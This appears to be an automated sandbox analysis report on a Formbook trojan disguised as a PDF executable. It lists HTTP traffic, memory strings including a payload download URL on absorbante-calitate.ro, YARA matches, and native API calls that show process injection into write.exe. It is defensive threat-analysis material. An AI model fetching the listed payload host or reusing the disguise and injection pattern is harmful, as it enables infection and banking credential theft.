Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:33:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:34:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 10:35:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 10:35:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: BM-FM_NR.24040718PDF.exe, 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmp, BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883213848.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000626000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorbante-calitate.ro/
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13534857876.00000000068FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://absorbante-calitate.ro/0H
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.bin
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13640013314.0000000006A50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://absorbante-calitate.ro/calitateX/lUMnxNJflRDqoVSbz65.binCredscroabsorbante-calitate.ro/calit
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13451908370.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13452315319.0000000006921000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639693496.0000000006920000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: unknown Network traffic detected: HTTP traffic on port 50244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50244
Source: unknown HTTPS traffic detected: 37.251.143.215:443 -> 192.168.11.20:50244 version: TLS 1.2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405086

E-Banking Fraud

Source: Yara match File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B234E0 NtCreateMutant,LdrInitializeThunk, 2_2_36B234E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22D10 NtQuerySystemInformation,LdrInitializeThunk, 2_2_36B22D10
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22B90 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_36B22B90
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B23C90 NtOpenThread, 2_2_36B23C90
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B23C30 NtOpenProcessToken, 2_2_36B23C30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B238D0 NtGetContextThread, 2_2_36B238D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B24570 NtSuspendThread, 2_2_36B24570
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B24260 NtSetContextThread, 2_2_36B24260
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22EB0 NtProtectVirtualMemory, 2_2_36B22EB0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22E80 NtCreateProcessEx, 2_2_36B22E80
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22ED0 NtResumeThread, 2_2_36B22ED0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22EC0 NtQuerySection, 2_2_36B22EC0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22E00 NtQueueApcThread, 2_2_36B22E00
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22E50 NtCreateSection, 2_2_36B22E50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22FB0 NtSetValueKey, 2_2_36B22FB0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22F30 NtOpenDirectoryObject, 2_2_36B22F30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22F00 NtCreateFile, 2_2_36B22F00
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22CF0 NtDelayExecution, 2_2_36B22CF0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22CD0 NtEnumerateKey, 2_2_36B22CD0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22C30 NtMapViewOfSection, 2_2_36B22C30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22C20 NtSetInformationFile, 2_2_36B22C20
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22C10 NtOpenProcess, 2_2_36B22C10
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22C50 NtUnmapViewOfSection, 2_2_36B22C50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22DA0 NtReadVirtualMemory, 2_2_36B22DA0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22DC0 NtAdjustPrivilegesToken, 2_2_36B22DC0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22D50 NtWriteVirtualMemory, 2_2_36B22D50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22AA0 NtQueryInformationFile, 2_2_36B22AA0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22A80 NtClose, 2_2_36B22A80
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22AC0 NtEnumerateValueKey, 2_2_36B22AC0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B22A10 NtWriteFile, 2_2_36B22A10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05204570 NtSuspendThread,LdrInitializeThunk, 5_2_05204570
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05204260 NtSetContextThread,LdrInitializeThunk, 5_2_05204260
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202D10 NtQuerySystemInformation,LdrInitializeThunk, 5_2_05202D10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202DA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_05202DA0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C30 NtMapViewOfSection,LdrInitializeThunk, 5_2_05202C30
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C50 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_05202C50
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202CF0 NtDelayExecution,LdrInitializeThunk, 5_2_05202CF0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202F00 NtCreateFile,LdrInitializeThunk, 5_2_05202F00
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202E00 NtQueueApcThread,LdrInitializeThunk, 5_2_05202E00
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202E50 NtCreateSection,LdrInitializeThunk, 5_2_05202E50
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202ED0 NtResumeThread,LdrInitializeThunk, 5_2_05202ED0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052029F0 NtReadFile,LdrInitializeThunk, 5_2_052029F0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B00 NtQueryValueKey,LdrInitializeThunk, 5_2_05202B00
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B10 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_05202B10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B80 NtCreateKey,LdrInitializeThunk, 5_2_05202B80
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B90 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_05202B90
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202BC0 NtQueryInformationToken,LdrInitializeThunk, 5_2_05202BC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202A10 NtWriteFile,LdrInitializeThunk, 5_2_05202A10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202A80 NtClose,LdrInitializeThunk, 5_2_05202A80
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202AC0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_05202AC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052034E0 NtCreateMutant,LdrInitializeThunk, 5_2_052034E0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052038D0 NtGetContextThread,LdrInitializeThunk, 5_2_052038D0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202D50 NtWriteVirtualMemory, 5_2_05202D50
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202DC0 NtAdjustPrivilegesToken, 5_2_05202DC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C20 NtSetInformationFile, 5_2_05202C20
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202C10 NtOpenProcess, 5_2_05202C10
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202CD0 NtEnumerateKey, 5_2_05202CD0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202F30 NtOpenDirectoryObject, 5_2_05202F30
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202FB0 NtSetValueKey, 5_2_05202FB0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202EB0 NtProtectVirtualMemory, 5_2_05202EB0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202E80 NtCreateProcessEx, 5_2_05202E80
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202EC0 NtQuerySection, 5_2_05202EC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_052029D0 NtWaitForSingleObject, 5_2_052029D0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202B20 NtQueryInformationProcess, 5_2_05202B20
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202BE0 NtQueryVirtualMemory, 5_2_05202BE0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05202AA0 NtQueryInformationFile, 5_2_05202AA0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05203C30 NtOpenProcessToken, 5_2_05203C30
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_05203C90 NtOpenThread, 5_2_05203C90
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE76B0 NtCreateFile, 5_2_02FE76B0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7AC0 NtAllocateVirtualMemory, 5_2_02FE7AC0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE78E0 NtDeleteFile, 5_2_02FE78E0
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7800 NtReadFile, 5_2_02FE7800
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FE7970 NtClose, 5_2_02FE7970
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040310F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Windows\resources\0409 Jump to behavior
Source: BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883268776.0000000000481000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebagprojektionens golfer.exe6 vs BM-FM_NR.24040718PDF.exe
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13533970795.0000000036880000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BM-FM_NR.24040718PDF.exe
